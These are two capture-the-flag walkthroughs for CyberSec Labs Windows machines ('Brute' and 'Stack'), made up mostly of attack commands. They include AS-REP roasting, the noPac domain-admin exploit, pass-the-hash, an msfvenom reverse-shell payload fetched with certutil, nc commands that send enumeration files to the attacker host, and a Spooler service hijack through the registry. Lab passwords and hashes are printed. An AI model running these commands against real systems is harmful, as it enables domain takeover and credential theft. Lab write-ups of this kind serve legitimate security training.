Cybersec Labs-ActiveDirectory Brute Walkthrough

After a period of regular privilege escalation attempts, I realized that I made a mistake, but it also made me more impressed and eager to try

Seriously, you'll find it fun

machine ip : 172.31.3.3

my ip : 10.10.0.82

port informations

Open 172.31.3.3:53
Open 172.31.3.3:88
Open 172.31.3.3:135
Open 172.31.3.3:139
Open 172.31.3.3:389
Open 172.31.3.3:445
Open 172.31.3.3:464
Open 172.31.3.3:593
Open 172.31.3.3:636
Open 172.31.3.3:3389
Open 172.31.3.3:5985
Open 172.31.3.3:9389
Open 172.31.3.3:47001
Open 172.31.3.3:49664
Open 172.31.3.3:49665
Open 172.31.3.3:49666
Open 172.31.3.3:49668
Open 172.31.3.3:49671
Open 172.31.3.3:49675
Open 172.31.3.3:49674
Open 172.31.3.3:49682
Open 172.31.3.3:49699
Open 172.31.3.3:49704

port 389 information

I FIND THE ldap port 389 is open,so i decide first to do thing is collect the ldap information

```

ldapsearch -x -s base namingcontexts -h 172.31.3.3

The DC.DOMAIN IS brute.csl

and then i need collect the username. or else DC information

port 445

enum4linux 172.31.3.3 -> we can find brute-DC and brute , add it to /etc/hosts , now we can use kerbrute to enum some exists user

./kerbrute userenum -d brute.csl /lab_test/windows_privilege/tryhard_cyber/brute/old/user --dc 172.31.3.3

we can found four users ,and i test AS-REP Ad vuln to bypass

impacket-GetNPUsers brute.csl/ -usersfile user -dc-ip 172.31.3.3 -format hashcat

we can get the user tess's hash, crack it

hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

tess : Unique1

try use impacket-GetUserSPNs and impacket-secretsdump but both fail

let's run smbmap and find something?

smbclient //172.31.3.3/SYSVOL -U "tess"

and nothing is youjiazhide.,but i can run evil-winrm to login tess account.

### Privilege to administrator way 1

Nopac -> CVE2021-42278

python3 noPac.py brute.csl/tess:Unique1 -dc-ip 172.31.3.3 --impersonate administrator -use-ldap -dump -just-dc-user administrator

evil-winrm -i 172.31.3.3 -u 'administrator' -H e2068a39ee8150b697797d6c3e513df7

### privilege to administrator way 2

### Privilege to

run bloodhound.exe and winpeasany.exe to find something.

certutil -urlcache -split -f http://10.10.0.82:82/SharpHound.exe

cmd.exe /c "winPEASany.exe > a.txt" # in lab machine

cmd.exe /c "nc.exe 10.10.0.82 9001 < a.txt" #in lab machine

nc -lvvp 9001 > peas.txt # in attack people machine

cmd.exe /c "SharpHound.exe -c all"

cmd.exe /c "nc.exe 10.10.0.82 9001 < 20220113052032_BloodHound.zip"

nc -lvvp 9001 > blod.zip

C:\Users\All Users\ntuser.pol

C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml

https://sdmsoftware.com/security-related/understanding-group-policy-privilege-escalation-in-cve-2020-1317/

certutil -urlcache -split -f http://10.10.0.82:82/SharpGPOAbuse.exe

### beyond root

PASS THE HASH

impacket-getTGT brute.csl/administrator -hashes e2068a39ee8150b697797d6c3e513df7:e2068a39ee8150b697797d6c3e513df7

export KRB5CCNAME=./administrator_brute-dc.brute.csl.ccache

impacket-psexec brute.csl/administrator@brute-dc.brute.csl -k -no-pass

cybersec_labs_windows_privilege_stack_walkthrough

Walkthrough Stack

After a period of regular privilege escalation attempts, I realized that I made a mistake, but it also made me more impressed and eager to try

Seriously, you'll find it fun

machine ip : 172.31.1.12

my ip : 10.10.0.33

Port information

172.31.1.12:80 Open

172.31.1.12:139 Open
172.31.1.12:135 Open
172.31.1.12:445 Open
172.31.1.12:3389 Open
172.31.1.12:5985 Open
172.31.1.12:47001 Open
172.31.1.12:49152 Open
172.31.1.12:49153 Open
172.31.1.12:49154 Open
172.31.1.12:49155 Open
172.31.1.12:49162 Open
172.31.1.12:49163 Open

172.31.1.12:49164 Open

I do the first thing is test port of 135,139,445 anonymous and try to find some share folder or someusername but nothing can found. so i view the website in 80 port.

This is a django website,and we can find three route,we can login /gitstack/ with default cred, and find the finger is gitstack 2.3.10.

searchsploit gitstack 2.3.10

The foothold

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.33 LPORT=23 -f exe -o rev.exe
edit the payload => command = "whoami" =>
certutil -urlcache -split -f http://10.10.0.33/rev.exe

and run it again, the command -> command = "rev.exe" to get a shell -> user ower john

We can get the access.txt

access.txt : reb656565983289247427842gtamf6

Privilege to Administrator

I run the systeminfo command can find the machine have 202 patch,and for this reason I wasted some time bypassing patch fixes,i will mention it in the beyond root section

Run winpeas to find it have keepass profile

Install the keepass in my windows machine,i found it need password

I tried KeeFarce first to get the password but it didn't work

So i use keepass2john to crack it

keepass2john pass.kdbx >> hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash --show

The password is princess ,now we can open the kdbx file

And copy the password to paste it,The password is secur3_apass262
So use evil-winrm to login it:

evil-winrm -i 172.31.1.12 -u 'administrator' -p 'secur3_apass262'

Beyond root

As mentioned earlier I wasted a lot of time bypassing patch fixes，so when i get the administrator, i login it and change remote settings to let's john to login, i want to see the exploit does it really not work

xfreerdp /u:administrator /p:secur3_apass262 /v:172.31.1.12

xfreerdp /u:john /p:s3cret123SEc /v:172.31.1.12

When i run beRoot.exe.i can find a service name of spooler, this service is vuln service,but not running.Even though we can modify the registry, we don't have permission to reboot

https://github.com/dievus/printspoofer

reg add HKLM\SYSTEM\CurrentControlSet\Services\Spooler /v ImagePath /t REG_EXPAND_SZ /d C:\users\john\desktop\rev.exe /f